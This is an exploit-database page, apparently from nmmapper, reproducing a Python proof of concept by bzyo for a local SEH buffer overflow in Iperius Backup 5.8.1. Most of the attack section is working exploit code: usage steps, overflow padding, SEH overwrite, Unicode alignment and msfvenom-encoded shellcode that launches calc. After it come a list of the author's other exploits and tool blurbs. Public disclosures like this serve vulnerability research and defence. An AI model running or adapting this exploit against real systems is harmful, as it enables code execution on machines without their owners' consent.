Search for hundreds of thousands of exploits

"Iperius Backup 5.8.1 - Buffer Overflow (SEH)"

Author

Exploit author

bzyo

Platform

Exploit platform

windows_x86

Release date

Exploit published date

2018-12-27

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
# Exploit Title: Iperius Backup 5.8.1 - Buffer Overflow (SEH)
# Date: 2018-12-26
# Exploit Author: bzyo
# Twitter: @bzyo_
# Vulnerable Software: Iperius Backup 5.8.1
# Vendor Homepage: https://www.iperiusbackup.com
# Version: 5.8.1 Local Buffer Overflow (SEH Unicode)
# Software Link: https://www.iperiusbackup.com/download.aspx?v=free
# Tested Windows 7 SP1 x86

# PoC
# 1. run script
# 2. open app and create backup job
# 3. on other processes tab, select 'run a program or open external file'
# 4. copy/paste iperius.txt contents into file location
# 5. select ok to complete creating backup job
# 6. run backup job
# 7. app crashes; pop calc

#!/usr/bin/python

filename="iperius.txt"

junk = "\x71" * 306

#popad
nseh = "\x61\x62"

#0x005b004a
#pop esi # pop ebx # ret  | startnull,unicode,asciiprint,ascii Iperius.exe
seh = "\x4a\x5b"

valign = (
"\x53" 					#push ebx
"\x47" 					#align
"\x58" 					#pop eax
"\x47" 					#align
"\x05\x12\x01" 	                        #add eax,200 
"\x47"					#align
"\x2d\x11\x01"	                        #sub eax,100
"\x47"					#align
"\x50"					#push eax
"\x47"					#align
"\xc3"					#retn
)

#509 bytes
#msfvenom -p windows/exec CMD=calc -e x86/unicode_upper BufferRegister=EAX
calc = (
"PPYAIAIAIAIAQATAXAZAPU3QADAZABARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA58AAPAZABABQI1AIQIAIQI1111AI"
"AJQI1AYAZBABABABAB30APB944JBKLZH4BM0M0KPS0SYIUP1Y01TTKR0NP4K1BLLDK0RN4DK42O8LOH70JMV01KO6LOL31SLKRNLO0"
"7QHOLMM17WK2L21B1GDKQBN04KOZOLDKPLN148ZC18KQJ121TKB9O0KQ9C4K0IN8ZCOJQ9TK04TKM1YF01KOVL7QXOLMM1GWNXK045"
"ZVLC3ML8OK3MO43EZDQHTKR8O4M1XS2FDKLLPK4KB8MLKQJ3TKKTTKM1XPCYOTMTO41K1K310YPZ21KOIPQOQOPZDKN2ZKDMQM1ZM1"
"TMU582KPKPKP201XNQ4KRODGKOXU7KZP7EVB26BH76TUGMUMKOXUOLLFCLKZSPKK9PD5KU7K0GN33BBO1ZM01CKOXUQS1QBL33M0AA")

nops = "\x71"*109

fill = "\x71"*1000

buffer = junk + nseh + seh + valign + nops + calc + fill
  
textfile = open(filename , 'w')
textfile.write(buffer)
textfile.close()
Release DateTitleTypePlatformAuthor
2020-04-20"Rubo DICOM Viewer 2.0 - Buffer Overflow (SEH)"localwindowsbzyo
2019-05-17"Iperius Backup 6.1.0 - Privilege Escalation"localwindowsbzyo
2019-05-06"NSClient++ 0.5.2.35 - Privilege Escalation"localwindowsbzyo
2019-02-14"exacqVision ESM 5.12.2 - Privilege Escalation"localwindowsbzyo
2019-01-30"10-Strike Network Inventory Explorer 8.54 - Local Buffer Overflow (SEH)(DEP Bypass)"localwindowsbzyo
2019-01-28"Faleemi Desktop Software 1.8 - Local Buffer Overflow (SEH)(DEP Bypass)"localwindowsbzyo
2019-01-11"Code Blocks 17.12 - Local Buffer Overflow (SEH) (Unicode)"localwindowsbzyo
2019-01-10"RGui 3.5.0 - Local Buffer Overflow (SEH)(DEP Bypass)"localwindowsbzyo
2018-12-27"Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)"localwindows_x86bzyo
2018-12-27"MAGIX Music Editor 3.1 - Buffer Overflow (SEH)"localwindows_x86bzyo
2018-12-27"Iperius Backup 5.8.1 - Buffer Overflow (SEH)"localwindows_x86bzyo
2018-12-20"Base64 Decoder 1.1.2 - Local Buffer Overflow (SEH)"localwindowsbzyo
2018-12-20"LanSpy 2.0.1.159 - Buffer Overflow (SEH) (Egghunter)"localwindows_x86bzyo
2018-12-11"PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion"webappsmultiplebzyo
2018-09-12"SynaMan 4.0 build 1488 - SMTP Credential Disclosure"webappswindowsbzyo
2018-09-12"SynaMan 4.0 build 1488 - Authenticated Cross-Site Scripting (XSS)"webappswindowsbzyo
2018-08-06"AgataSoft Auto PingMaster 1.5 - Buffer Overflow (SEH)"localwindowsbzyo
2018-07-23"Splinterware System Scheduler Pro 5.12 - Privilege Escalation"localwindowsbzyo
2018-07-23"Splinterware System Scheduler Pro 5.12 - Buffer Overflow (SEH)"localwindowsbzyo
2018-05-06"HWiNFO 5.82-3410 - Denial of Service"doswindowsbzyo
2018-04-24"RGui 3.4.4 - Local Buffer Overflow"localwindowsbzyo
2018-04-18"Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities"webappsxmlbzyo
2018-04-17"Reaper 5.78 - Local Buffer Overflow"localwindowsbzyo
2018-04-09"GoldWave 5.70 - Local Buffer Overflow (SEH Unicode)"localwindowsbzyo
2018-04-02"WebLog Expert Enterprise 9.4 - Privilege Escalation"localwindowsbzyo
2018-03-26"LabF nfsAxe 3.7 - Privilege Escalation"localwindowsbzyo
2018-03-23"WM Recorder 16.8.1 - Denial of Service"doswindowsbzyo
2018-03-05"Dup Scout Enterprise 10.5.12 - 'Share Username' Local Buffer Overflow"localwindowsbzyo
2018-03-02"IrfanView 4.44 Email Plugin - Buffer Overflow (SEH)"localwindowsbzyo
2018-03-02"IrfanView 4.50 Email Plugin - Buffer Overflow (SEH Unicode)"localwindowsbzyo
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46059/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.